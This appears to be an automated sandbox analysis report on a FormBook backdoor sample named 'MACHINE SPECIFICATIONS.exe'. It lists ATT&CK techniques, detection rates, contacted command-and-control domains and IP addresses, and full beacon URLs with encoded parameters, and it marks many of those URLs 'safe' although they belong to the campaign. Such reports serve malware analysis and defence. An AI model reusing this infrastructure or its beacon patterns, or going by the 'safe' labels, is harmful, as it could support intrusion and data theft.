Source: Yara match	File source: 00000004.00000002.110844494408.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	612 Process Injection	2 Virtualization/Sandbox Evasion	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	612 Process Injection	LSASS Memory	141 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	Security Account Manager	2 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Abuse Elevation Control Mechanism	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	113 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
MACHINE SPECIFICATIONS.exe	47%	ReversingLabs	Win64.Backdoor.FormBook
MACHINE SPECIFICATIONS.exe	33%	Virustotal		Browse
MACHINE SPECIFICATIONS.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.rpa.asia/bwjl/?AuPF3v=DlXUXSIcZnIsgzl0u4NtOaZFY3Bzu0GepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v3ILJktUUuvXcybstOw=&v1GdZ=vUN3	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-72.png	0%	Avira URL Cloud	safe
http://www.ogbos88.cyou	0%	Avira URL Cloud	safe
http://www.furrcali.xyz/k29t/?AuPF3v=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaV6xOj1iJ+/0Z9jT4Yg=&v1GdZ=vUN3	100%	Avira URL Cloud	malware
http://www.ogbos88.cyou/kj1o/	0%	Avira URL Cloud	safe
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	0%	Avira URL Cloud	safe
http://www.chiro.live/jwa9/	0%	Avira URL Cloud	safe
http://maximumgroup.co.za/cxj4/?v1GdZ=vUN3&AuPF3v=gKtC9mpNHTkTr00OOrlul8C1Q	0%	Avira URL Cloud	safe
http://www.chiro.live/jwa9/?AuPF3v=nbEb6BapjrCYd3vpIU65dRTaoPK2c484Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKRb9RHtiv87SZwxMyIk=&v1GdZ=vUN3	0%	Avira URL Cloud	safe
http://www.rpa.asia/bwjl/	0%	Avira URL Cloud	safe
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	0%	Avira URL Cloud	safe
http://www.furrcali.xyz/k29t/	100%	Avira URL Cloud	malware
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	0%	Avira URL Cloud	safe
http://www.100millionjobs.africa/cxj4/	0%	Avira URL Cloud	safe
http://www.buyspeechst.shop/w98i/	0%	Avira URL Cloud	safe
http://www.bonheur.tech/t3iv/	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/logo/logo-loopia-white.svg	0%	Avira URL Cloud	safe
http://maximumgroup.co.za/cxj4/?v1GdZ=vUN3&AuPF3v=gKtC9mpNHTkTr00OOrlul8C1Q	0%	Avira URL Cloud	safe
http://www.zbywl.com/js.js	0%	Avira URL Cloud	safe
http://www.100millionjobs.africa/cxj4/?v1GdZ=vUN3&AuPF3v=gKtC9mpNHTkTr00OOrlul8C1Q+DXvNuoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqILyFVQkk3fe4uC3E7DA=	0%	Avira URL Cloud	safe
http://www70.chiro.live/	0%	Avira URL Cloud	safe
http://www.buyspeechst.shop/w98i/?v1GdZ=vUN3&AuPF3v=UfwHaNGeM7ohZqxMT1oJCRJMGlT3jOeFYxLhiKeMkeFhJQngpiBu1nR/iO/Vw2KMOuQK2IyXNyNkQANnRhWnyAeSvZ4PYAj0T7gn5XvtXdm/7Udw9aOHtOE=	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/style/2022-extra-pages.css	0%	Avira URL Cloud	safe
http://www.nextlevel.finance/kgjj/	0%	Avira URL Cloud	safe
http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736760309.0064952172&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiY	0%	Avira URL Cloud	safe
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-114.png	0%	Avira URL Cloud	safe
http://www.givvjn.info/nkmx/	0%	Avira URL Cloud	safe
http://www.lejgnu.info/gcvb/?AuPF3v=R3JWUl3ivpsXcFtCJulnieIWto+O00LjcoMED/ZSuHZ0i4hSpIKzgOSsfpnIAqnHyqi+O0adg4Vr07jACry21CI+4oE0/hewEO2O8KeqeYy4LCD4K2ParBE=&v1GdZ=vUN3	0%	Avira URL Cloud	safe
http://www.givvjn.info/nkmx/?AuPF3v=eUQnbnMYY/LCOqGESTL4TQrP6i0At1UjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth90fPOn8W2O2KjrJHqc=&v1GdZ=vUN3	0%	Avira URL Cloud	safe
https://www.furrcali.xyz/k29t/?AuPF3v=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGe	100%	Avira URL Cloud	malware
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Avira URL Cloud	safe
https://ogbos88vip.click	0%	Avira URL Cloud	safe
http://www.bonheur.tech/t3iv/?v1GdZ=vUN3&AuPF3v=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc=	0%	Avira URL Cloud	safe
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut	0%	Avira URL Cloud	safe
http://www.bokus.site/qps0/	0%	Avira URL Cloud	safe
http://www.mirenzhibo.net/wbfy/	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/styles/reset.css	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-57.png	0%	Avira URL Cloud	safe
http://www.mirenzhibo.net/wbfy/?AuPF3v=Xeeb3ImT6ZQQytgHl6ygbKjk3RvUis2KlqPkukVQbKRvaGCiHgrQQJpKPHE9m9OFKl001Zh7fqviaNy8QasigmVtVgrnFrjMGvUSPQegMjeyq5uNXxHJj0c=&v1GdZ=vUN3	0%	Avira URL Cloud	safe
http://www.mzkd6gp5.top/3u0p/?v1GdZ=vUN3&AuPF3v=s2YzwEkhsdaL/kJQlHk7A3SE2/Z36REv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/5arF9GGIcX7zSRGFgQ=	0%	Avira URL Cloud	safe
http://www.lejgnu.info/gcvb/	0%	Avira URL Cloud	safe
http://www.mzkd6gp5.top/3u0p/	0%	Avira URL Cloud	safe
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
http://www.nextlevel.finance/kgjj/?v1GdZ=vUN3&AuPF3v=m0PzV+DL9MdhQie6uq/amrvVR35Q8Tf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZYXkuMLBntBAotkskh0=	0%	Avira URL Cloud	safe
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb	0%	Avira URL Cloud	safe
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.rpa.asia	160.25.166.123	true	true	unknown
www.mirenzhibo.net	202.95.11.110	true	true	unknown
www.furrcali.xyz	103.106.67.112	true	true	unknown
www.milp.store	194.9.94.86	true	true	unknown
www.bonheur.tech	13.248.169.48	true	true	unknown
www.lejgnu.info	47.83.1.90	true	true	unknown
www.chiro.live	45.56.79.23	true	true	unknown
www.bokus.site	199.192.21.169	true	true	unknown
www.givvjn.info	47.83.1.90	true	true	unknown
www.mzkd6gp5.top	104.21.16.1	true	true	unknown
100millionjobs.africa	136.243.64.147	true	true	unknown
www.nextlevel.finance	13.248.169.48	true	true	unknown
www.ogbos88.cyou	172.67.132.227	true	true	unknown
www.buyspeechst.shop	104.21.112.1	true	true	unknown
www.elettrocoltura.info	unknown	unknown	false	unknown
www.100millionjobs.africa	unknown	unknown	false	unknown
www.smartbath.shop	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.furrcali.xyz/k29t/?AuPF3v=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaV6xOj1iJ+/0Z9jT4Yg=&v1GdZ=vUN3	true	Avira URL Cloud: malware	unknown
http://www.rpa.asia/bwjl/?AuPF3v=DlXUXSIcZnIsgzl0u4NtOaZFY3Bzu0GepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v3ILJktUUuvXcybstOw=&v1GdZ=vUN3	true	Avira URL Cloud: safe	unknown
http://www.rpa.asia/bwjl/	true	Avira URL Cloud: safe	unknown
http://www.ogbos88.cyou/kj1o/	true	Avira URL Cloud: safe	unknown
http://www.chiro.live/jwa9/?AuPF3v=nbEb6BapjrCYd3vpIU65dRTaoPK2c484Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKRb9RHtiv87SZwxMyIk=&v1GdZ=vUN3	true	Avira URL Cloud: safe	unknown
http://www.chiro.live/jwa9/	true	Avira URL Cloud: safe	unknown
http://www.furrcali.xyz/k29t/	true	Avira URL Cloud: malware	unknown
http://www.buyspeechst.shop/w98i/	true	Avira URL Cloud: safe	unknown
http://www.bonheur.tech/t3iv/	true	Avira URL Cloud: safe	unknown
http://www.100millionjobs.africa/cxj4/?v1GdZ=vUN3&AuPF3v=gKtC9mpNHTkTr00OOrlul8C1Q+DXvNuoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqILyFVQkk3fe4uC3E7DA=	true	Avira URL Cloud: safe	unknown
http://www.100millionjobs.africa/cxj4/	true	Avira URL Cloud: safe	unknown
http://www.nextlevel.finance/kgjj/	true	Avira URL Cloud: safe	unknown
http://www.buyspeechst.shop/w98i/?v1GdZ=vUN3&AuPF3v=UfwHaNGeM7ohZqxMT1oJCRJMGlT3jOeFYxLhiKeMkeFhJQngpiBu1nR/iO/Vw2KMOuQK2IyXNyNkQANnRhWnyAeSvZ4PYAj0T7gn5XvtXdm/7Udw9aOHtOE=	true	Avira URL Cloud: safe	unknown
http://www.lejgnu.info/gcvb/?AuPF3v=R3JWUl3ivpsXcFtCJulnieIWto+O00LjcoMED/ZSuHZ0i4hSpIKzgOSsfpnIAqnHyqi+O0adg4Vr07jACry21CI+4oE0/hewEO2O8KeqeYy4LCD4K2ParBE=&v1GdZ=vUN3	true	Avira URL Cloud: safe	unknown
http://www.givvjn.info/nkmx/	true	Avira URL Cloud: safe	unknown
http://www.givvjn.info/nkmx/?AuPF3v=eUQnbnMYY/LCOqGESTL4TQrP6i0At1UjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth90fPOn8W2O2KjrJHqc=&v1GdZ=vUN3	true	Avira URL Cloud: safe	unknown
http://www.bonheur.tech/t3iv/?v1GdZ=vUN3&AuPF3v=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc=	true	Avira URL Cloud: safe	unknown
http://www.bokus.site/qps0/	true	Avira URL Cloud: safe	unknown
http://www.mirenzhibo.net/wbfy/	true	Avira URL Cloud: safe	unknown
http://www.mirenzhibo.net/wbfy/?AuPF3v=Xeeb3ImT6ZQQytgHl6ygbKjk3RvUis2KlqPkukVQbKRvaGCiHgrQQJpKPHE9m9OFKl001Zh7fqviaNy8QasigmVtVgrnFrjMGvUSPQegMjeyq5uNXxHJj0c=&v1GdZ=vUN3	true	Avira URL Cloud: safe	unknown
http://www.lejgnu.info/gcvb/	true	Avira URL Cloud: safe	unknown
http://www.mzkd6gp5.top/3u0p/?v1GdZ=vUN3&AuPF3v=s2YzwEkhsdaL/kJQlHk7A3SE2/Z36REv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/5arF9GGIcX7zSRGFgQ=	true	Avira URL Cloud: safe	unknown
http://www.mzkd6gp5.top/3u0p/	true	Avira URL Cloud: safe	unknown
http://www.nextlevel.finance/kgjj/?v1GdZ=vUN3&AuPF3v=m0PzV+DL9MdhQie6uq/amrvVR35Q8Tf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZYXkuMLBntBAotkskh0=	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	cmdkey.exe, 00000004.00000003.107468616539.0000000007EDB000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.4.dr	false		high
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search	cmdkey.exe, 00000004.00000003.107468616539.0000000007EDB000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846786441.0000000007F3E000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.4.dr	false		high
https://duckduckgo.com/ac/?q=	b427-I_1.4.dr	false		high
http://maximumgroup.co.za/cxj4/?v1GdZ=vUN3&AuPF3v=gKtC9mpNHTkTr00OOrlul8C1Q	RAVCpl64.exe, 00000003.00000002.111799235023.00000000084B8000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.00000000050D8000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://push.zhanzhang.baidu.com/push.js	RAVCpl64.exe, 00000003.00000002.111799235023.000000000864A000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.000000000526A000.00000004.10000000.00040000.00000000.sdmp	false		high
https://static.loopia.se/responsive/images/iOS-72.png	RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ogbos88.cyou	RAVCpl64.exe, 00000003.00000002.111783922720.0000000000887000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	cmdkey.exe, 00000004.00000003.107468616539.0000000007EDB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.loopia.se/shared/logo/logo-loopia-white.svg	RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	cmdkey.exe, 00000004.00000003.107468616539.0000000007EDB000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846786441.0000000007F3E000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.4.dr	false		high
http://maximumgroup.co.za/cxj4/?v1GdZ=vUN3&AuPF3v=gKtC9mpNHTkTr00OOrlul8C1Q	RAVCpl64.exe, 00000003.00000002.111799235023.00000000084B8000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.00000000050D8000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zbywl.com/js.js	RAVCpl64.exe, 00000003.00000002.111799235023.000000000864A000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.000000000526A000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736760309.0064952172&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiY	RAVCpl64.exe, 00000003.00000002.111799235023.0000000007696000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.00000000042B6000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www70.chiro.live/	cmdkey.exe, 00000004.00000002.110845588280.00000000042B6000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/style/2022-extra-pages.css	RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/responsive/images/iOS-114.png	RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	b427-I_1.4.dr	false		high
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	b427-I_1.4.dr	false		high
https://zz.bdstatic.com/linksubmit/push.js	RAVCpl64.exe, 00000003.00000002.111799235023.000000000864A000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.000000000526A000.00000004.10000000.00040000.00000000.sdmp	false		high
https://www.furrcali.xyz/k29t/?AuPF3v=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGe	cmdkey.exe, 00000004.00000002.110845588280.000000000558E000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ogbos88vip.click	RAVCpl64.exe, 00000003.00000002.111799235023.0000000008194000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004DB4000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut	RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	cmdkey.exe, 00000004.00000003.107468616539.0000000007EDB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.loopia.se/responsive/styles/reset.css	RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	cmdkey.exe, 00000004.00000003.107468616539.0000000007EDB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.loopia.se/responsive/images/iOS-57.png	RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin	RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	cmdkey.exe, 00000004.00000003.107468616539.0000000007EDB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	cmdkey.exe, 00000004.00000003.107468616539.0000000007EDB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
